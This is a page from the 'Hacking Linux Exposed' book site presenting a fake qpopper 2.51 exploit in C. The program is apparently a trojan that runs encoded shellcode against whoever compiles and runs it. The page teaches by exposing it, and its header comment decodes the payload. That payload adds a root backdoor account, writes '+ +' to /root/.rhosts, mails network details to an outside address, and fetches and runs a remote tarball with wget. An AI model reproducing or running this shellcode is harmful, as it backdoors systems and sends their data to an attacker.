Hacking Linux Exposed

About
Authors
Contents
Reviews
Foreword
Purchase

Articles
Books
Sourcecode
Tools
Errata

Home

 


(view this code in a separate window) 

/*
   This is a bit of code that claims to be an
   exploit to a potential qpopper buffer
   overflow.
   
   Rather than actually exploiting the buffer
   overflow, it will run the 'shellcode' as the
   invoking user on the local system.

   The actual commands run by the 'shellcode' above are:

    d=a+.com;
    echo '+ +'>>/root/.rhosts;
    (/sbin/ifconfig -a;/bin/netstat -na)|/bin/mail
   	 h3aT@$d >/dev/null;
    rm -rf h h.tar;
    echo 'h3aT:x:0:0::/:/bin/bash' >>/etc/passwd;
    echo 'h3aT:h311hrhOKim4g::::::::'>>/etc/shadow;
    wget http://$d/h.tar;tar -xf h.tar >/dev/null;
    sh h/run.sh;
    rm -rf h
 
*/






/*
   qpopper 2.51 exploit code for Linux i386.
   You will need to try this with various offsets,
   usually somewhere between 300 and 650.
   
   To compile:   gcc -o popexp popexp.c
   Usage:  popexp hostname offset
*/

char shellcode[] = "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0f\x31"
"\xc9\x66\xb9\x8c\x01\x80\x36\x02\x46\xe2\xfa\xeb\x33\x03\x02\x02\x2d\x60\x6b"
"\x6c\x2d\x71\x6a\x02\x2f\x61\x02\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92"
"\x92\x92\x92\x92\x92\x66\x3f\x63\x29\x2c\x61\x6d\x6f\x39\x67\x61\x6a\x6d\x22"
"\x25\x29\x22\x29\x25\x3c\x3c\x2d\x70\x6d\x6d\x76\x2d\x2c\x70\x6a\x6d\x71\x76"
"\x71\x39\x2a\x2d\x71\x60\x6b\x6c\x2d\x6b\x64\x61\x6d\x6c\x64\x6b\x65\x22\x2f"
"\x63\x39\x2d\x60\x6b\x6c\x2d\x6c\x67\x76\x71\x76\x63\x76\x22\x2f\x6c\x63\x2b"
"\x7e\x2d\x60\x6b\x6c\x2d\x6f\x63\x6b\x6e\x22\x6a\x31\x63\x56\x42\x26\x66\x22"
"\x3c\x2d\x66\x67\x74\x2d\x6c\x77\x6e\x6e\x39\x70\x6f\x22\x2f\x70\x64\x22\x6a"
"\x22\x6a\x2c\x76\x63\x70\x39\x67\x61\x6a\x6d\x22\x25\x6a\x31\x63\x56\x38\x7a"
"\x38\x32\x38\x32\x38\x38\x2d\x38\x2d\x60\x6b\x6c\x2d\x60\x63\x71\x6a\x25\x22"
"\x3c\x3c\x2d\x67\x76\x61\x2d\x72\x63\x71\x71\x75\x66\x39\x67\x61\x6a\x6d\x22"
"\x25\x6a\x31\x63\x56\x38\x6a\x31\x33\x33\x6a\x70\x6a\x4d\x49\x6b\x6f\x36\x65"
"\x38\x38\x38\x38\x38\x38\x38\x38\x25\x3c\x3c\x2d\x67\x76\x61\x2d\x71\x6a\x63"
"\x66\x6d\x75\x39\x75\x65\x67\x76\x22\x6a\x76\x76\x72\x38\x2d\x2d\x26\x66\x2d"
"\x6a\x2c\x76\x63\x70\x39\x76\x63\x70\x22\x2f\x7a\x64\x22\x6a\x2c\x76\x63\x70"
"\x22\x3c\x2d\x66\x67\x74\x2d\x6c\x77\x6e\x6e\x39\x71\x6a\x22\x6a\x2d\x70\x77"
"\x6c\x2c\x71\x6a\x39\x22\x70\x6f\x22\x2f\x70\x64\x22\x6a\x02\x39\x02\x83\xee"
"\x65\x29\x02\x02\x57\x8b\xe7\x81\xee\x12\x54\x51\xea\x02\x02\x02\x02\x59\x83"
"\xc1\xb5\x12\x02\x02\x8f\xb1\x07\xec\xfd\xfd\x8b\x77\xf2\x8f\x81\x0f\xec\xfd"
"\xfd\x8b\x47\xf6\x8f\x81\x22\xec\xfd\xfd\x8b\x47\xfa\xc5\x47\xfe\x02\x02\x02"
"\x02\x8f\x4f\xf2\xba\x09\x02\x02\x02\x33\xd0\x51\x8b\xf1\xcf\x82\x33\xc2\x8f"
"\x67\xea\x59\x5c\xcb\xc1\x92\x92\x00"

int (*exploit)();

void usage( char *argvzero ) {
	fprintf( stderr, "Usage: %s hostname offset\n", argvzero);
	exit(1);
}


int main( int argc, char **argv ) {

   int offset;
   char hostname[BUFSIZ];


	if ( argc != 2 ) {
		usage(*argv);
	}
	offset = atoi( argv[2] );
	(char*) exploit = shellcode;


	/* Include lots of code here to make it look like this
	 * program is legitimate.  Do some hostname lookups,
	 * grab the POP port from getservbyname(3), maybe
	 * even establish the POP connection, sending it
	 * random junk.  Then we run the actual exploit
	 * against the invoking user, having pointed the
	 * exploit function pointer to our shellcode above.
	 */

	exploit();
	exit(0);


}